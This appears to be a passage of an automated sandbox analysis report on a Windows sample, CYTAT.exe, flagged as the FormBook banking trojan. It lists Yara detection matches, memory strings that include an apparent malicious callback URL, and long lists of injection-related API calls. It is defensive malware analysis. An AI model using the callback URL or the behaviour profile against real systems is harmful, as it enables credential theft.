            Source: netbtugc.exe, 0000000C.00000003.1808011117.0000000007C0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: netbtugc.exe, 0000000C.00000002.3101363339.0000000000D09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: netbtugc.exe, 0000000C.00000002.3101363339.0000000000D09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: netbtugc.exe, 0000000C.00000002.3101363339.0000000000D09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: netbtugc.exe, 0000000C.00000002.3101363339.0000000000D09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: netbtugc.exe, 0000000C.00000002.3101363339.0000000000D09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: netbtugc.exe, 0000000C.00000002.3101363339.0000000000D09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: netbtugc.exe, 0000000C.00000003.1799028301.0000000007BE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: netbtugc.exe, 0000000C.00000002.3109366430.00000000061C0000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 0000000C.00000002.3107256962.0000000004560000.00000004.10000000.00040000.00000000.sdmp, eMNaOgRkIZi.exe, 0000000D.00000002.3106679302.0000000003680000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://whois.gandi.net/en/results?search=languagemodel.pro
            Source: netbtugc.exe, 0000000C.00000003.1808011117.0000000007C0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: netbtugc.exe, 0000000C.00000002.3107256962.0000000003F18000.00000004.10000000.00040000.00000000.sdmp, eMNaOgRkIZi.exe, 0000000D.00000002.3106679302.0000000003038000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.1913472378.0000000025CF8000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.elsupertodo.net/2jit/?QF4tL=lBP8AZrpnb&7lpPGx=iS4P4oRSl8BXKzGDEvFFA2xLKhJOP7i6JXAZlPSQuk
            Source: netbtugc.exe, 0000000C.00000002.3109366430.00000000061C0000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 0000000C.00000002.3107256962.0000000004560000.00000004.10000000.00040000.00000000.sdmp, eMNaOgRkIZi.exe, 0000000D.00000002.3106679302.0000000003680000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.gandi.net/en/domain
            Source: netbtugc.exe, 0000000C.00000003.1808011117.0000000007C0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046DC80
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,0_2_0044C37A
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C81C

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 4.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000C.00000002.3106282282.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3106163686.0000000003240000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1475778706.0000000003420000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3099190951.0000000000C80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1476818616.0000000004600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1472630321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3094745137.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 4.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 4.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000C.00000002.3106282282.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000A.00000002.3106163686.0000000003240000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.1475778706.0000000003420000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000C.00000002.3099190951.0000000000C80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.1476818616.0000000004600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.1472630321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000C.00000002.3094745137.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0042C063 NtClose,4_2_0042C063
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03572B60 NtClose,LdrInitializeThunk,4_2_03572B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03572DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_03572DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03572C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_03572C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035735C0 NtCreateMutant,LdrInitializeThunk,4_2_035735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03574340 NtSetContextThread,4_2_03574340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03574650 NtSuspendThread,4_2_03574650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03572BF0 NtAllocateVirtualMemory,4_2_03572BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03572BE0 NtQueryValueKey,4_2_03572BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03572B80 NtQueryInformationFile,4_2_03572B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03572BA0 NtEnumerateValueKey,4_2_03572BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03572AD0 NtReadFile,4_2_03572AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03572AF0 NtWriteFile,4_2_03572AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03572AB0 NtWaitForSingleObject,4_2_03572AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03572F60 NtCreateProcessEx,4_2_03572F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03572F30 NtCreateSection,4_2_03572F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03572FE0 NtCreateFile,4_2_03572FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03572F90 NtProtectVirtualMemory,4_2_03572F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03572FB0 NtResumeThread,4_2_03572FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03572FA0 NtQuerySection,4_2_03572FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03572E30 NtWriteVirtualMemory,4_2_03572E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03572EE0 NtQueueApcThread,4_2_03572EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03572E80 NtReadVirtualMemory,4_2_03572E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03572EA0 NtAdjustPrivilegesToken,4_2_03572EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03572D10 NtMapViewOfSection,4_2_03572D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03572D00 NtSetInformationFile,4_2_03572D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03572D30 NtUnmapViewOfSection,4_2_03572D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03572DD0 NtDelayExecution,4_2_03572DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03572DB0 NtEnumerateKey,4_2_03572DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03572C60 NtCreateKey,4_2_03572C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03572C00 NtQueryInformationProcess,4_2_03572C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03572CC0 NtQueryVirtualMemory,4_2_03572CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03572CF0 NtOpenProcess,4_2_03572CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03572CA0 NtQueryInformationToken,4_2_03572CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03573010 NtOpenDirectoryObject,4_2_03573010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03573090 NtSetValueKey,4_2_03573090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035739B0 NtGetContextThread,4_2_035739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03573D70 NtOpenThread,4_2_03573D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03573D10 NtOpenProcessToken,4_2_03573D10
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03254340 NtSetContextThread,LdrInitializeThunk,12_2_03254340
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03254650 NtSuspendThread,LdrInitializeThunk,12_2_03254650
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03252B60 NtClose,LdrInitializeThunk,12_2_03252B60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03252BA0 NtEnumerateValueKey,LdrInitializeThunk,12_2_03252BA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03252BE0 NtQueryValueKey,LdrInitializeThunk,12_2_03252BE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03252BF0 NtAllocateVirtualMemory,LdrInitializeThunk,12_2_03252BF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03252AF0 NtWriteFile,LdrInitializeThunk,12_2_03252AF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03252AD0 NtReadFile,LdrInitializeThunk,12_2_03252AD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03252F30 NtCreateSection,LdrInitializeThunk,12_2_03252F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03252FB0 NtResumeThread,LdrInitializeThunk,12_2_03252FB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03252FE0 NtCreateFile,LdrInitializeThunk,12_2_03252FE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03252E80 NtReadVirtualMemory,LdrInitializeThunk,12_2_03252E80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03252EE0 NtQueueApcThread,LdrInitializeThunk,12_2_03252EE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03252D30 NtUnmapViewOfSection,LdrInitializeThunk,12_2_03252D30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03252D10 NtMapViewOfSection,LdrInitializeThunk,12_2_03252D10
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03252DF0 NtQuerySystemInformation,LdrInitializeThunk,12_2_03252DF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03252DD0 NtDelayExecution,LdrInitializeThunk,12_2_03252DD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03252C60 NtCreateKey,LdrInitializeThunk,12_2_03252C60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03252C70 NtFreeVirtualMemory,LdrInitializeThunk,12_2_03252C70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03252CA0 NtQueryInformationToken,LdrInitializeThunk,12_2_03252CA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_032535C0 NtCreateMutant,LdrInitializeThunk,12_2_032535C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_032539B0 NtGetContextThread,LdrInitializeThunk,12_2_032539B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03252B80 NtQueryInformationFile,12_2_03252B80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03252AB0 NtWaitForSingleObject,12_2_03252AB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03252F60 NtCreateProcessEx,12_2_03252F60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03252FA0 NtQuerySection,12_2_03252FA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03252F90 NtProtectVirtualMemory,12_2_03252F90
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03252E30 NtWriteVirtualMemory,12_2_03252E30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03252EA0 NtAdjustPrivilegesToken,12_2_03252EA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03252D00 NtSetInformationFile,12_2_03252D00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03252DB0 NtEnumerateKey,12_2_03252DB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03252C00 NtQueryInformationProcess,12_2_03252C00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03252CF0 NtOpenProcess,12_2_03252CF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03252CC0 NtQueryVirtualMemory,12_2_03252CC0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03253010 NtOpenDirectoryObject,12_2_03253010
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03253090 NtSetValueKey,12_2_03253090
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03253D10 NtOpenProcessToken,12_2_03253D10
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03253D70 NtOpenThread,12_2_03253D70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_00A28CF0 NtCreateFile,12_2_00A28CF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_00A28E60 NtReadFile,12_2_00A28E60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_00A28F50 NtDeleteFile,12_2_00A28F50
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_00A29000 NtClose,12_2_00A29000
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_00A29160 NtAllocateVirtualMemory,12_2_00A29160
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00431BE8
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00446313
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_004096A00_2_004096A0
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_0042200C0_2_0042200C
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_0041A2170_2_0041A217
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_004122160_2_00412216
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_0042435D0_2_0042435D
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_004033C00_2_004033C0
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_0044F4300_2_0044F430
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_004125E80_2_004125E8
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_0044663B0_2_0044663B
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_004138010_2_00413801
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_0042096F0_2_0042096F
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_004129D00_2_004129D0
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_004119E30_2_004119E3
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_0041C9AE0_2_0041C9AE
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_0047EA6F0_2_0047EA6F
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_0040FA100_2_0040FA10
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_0044EB5F0_2_0044EB5F
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_00423C810_2_00423C81
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_00411E780_2_00411E78
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_00442E0C0_2_00442E0C
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_00420EC00_2_00420EC0
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_0044CF170_2_0044CF17
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_00444FD20_2_00444FD2
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_03FC27500_2_03FC2750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004181134_2_00418113
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0040F9C34_2_0040F9C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0040F9BC4_2_0040F9BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004022094_2_00402209
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004022104_2_00402210
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004162FE4_2_004162FE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004162BC4_2_004162BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004163034_2_00416303
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0040FBE34_2_0040FBE3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0040DC634_2_0040DC63
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_00402DC04_2_00402DC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0042E6534_2_0042E653
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035FA3524_2_035FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_036003E64_2_036003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0354E3F04_2_0354E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035E02744_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035C02C04_2_035C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035C81584_2_035C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035DA1184_2_035DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035301004_2_03530100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035F81CC4_2_035F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_036001AA4_2_036001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035D20004_2_035D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035647504_2_03564750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035407704_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0353C7C04_2_0353C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0355C6E04_2_0355C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035405354_2_03540535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_036005914_2_03600591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035F24464_2_035F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035EE4F64_2_035EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035FAB404_2_035FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035F6BD74_2_035F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0353EA804_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035569624_2_03556962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0360A9A64_2_0360A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035429A04_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0354A8404_2_0354A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035428404_2_03542840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0356E8F04_2_0356E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035268B84_2_035268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B4F404_2_035B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03560F304_2_03560F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03582F284_2_03582F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03532FC84_2_03532FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0354CFE04_2_0354CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035BEFA04_2_035BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03540E594_2_03540E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035FEE264_2_035FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035FEEDB4_2_035FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03552E904_2_03552E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035FCE934_2_035FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035DCD1F4_2_035DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0354AD004_2_0354AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0353ADE04_2_0353ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03558DBF4_2_03558DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03540C004_2_03540C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03530CF24_2_03530CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035E0CB54_2_035E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0352D34C4_2_0352D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035F132D4_2_035F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0358739A4_2_0358739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0355B2C04_2_0355B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035E12ED4_2_035E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035452A04_2_035452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0360B16B4_2_0360B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0352F1724_2_0352F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0357516C4_2_0357516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0354B1B04_2_0354B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035EF0CC4_2_035EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035470C04_2_035470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035F70E94_2_035F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035FF0E04_2_035FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035FF7B04_2_035FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035F16CC4_2_035F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035F75714_2_035F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035DD5B04_2_035DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035314604_2_03531460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035FF43F4_2_035FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035FFB764_2_035FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B5BF04_2_035B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0357DBF94_2_0357DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0355FB804_2_0355FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035FFA494_2_035FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035F7A464_2_035F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B3A6C4_2_035B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035EDAC64_2_035EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035DDAAC4_2_035DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03585AA04_2_03585AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035499504_2_03549950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0355B9504_2_0355B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035D59104_2_035D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035AD8004_2_035AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035438E04_2_035438E0
